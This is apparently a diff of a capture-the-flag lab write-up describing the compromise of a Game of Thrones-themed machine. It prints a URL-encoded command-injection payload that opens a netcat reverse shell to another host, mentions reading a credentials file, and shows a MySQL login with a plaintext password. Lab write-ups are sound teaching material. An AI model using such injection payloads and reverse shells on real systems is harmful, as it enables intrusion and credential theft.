AriannaMucig/CybersecurityLab/home.md

 `http://192.168.1.124:1337/casterly-rock/blob/master/%22%22%60nc 192.168.1.58 5555 -e /bin/bash%60`.
 The server instantly executed the payload, yielding a reverse shell.
 I navigated to Tyrion's home folder and read the `checkpoint.txt` file to gather final database credentials.

-The King's Landing required interaction with the local MySQL database.
+The compromise of King's Landing required interaction with the local MySQL database.
 Using the credentials extracted from the checkpoint file, I logged into the database engine directly from the compromised shell environment: `mysql -h 127.0.0.1 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding`.

 I listed the tables and discovered a table named `iron_throne`.
 Running a `SELECT *` query on it returned an obfuscated message written in Morse Code.
 Translating it using an external web utility pointed to an unconventional system file path: `/etc/mysql/flag`.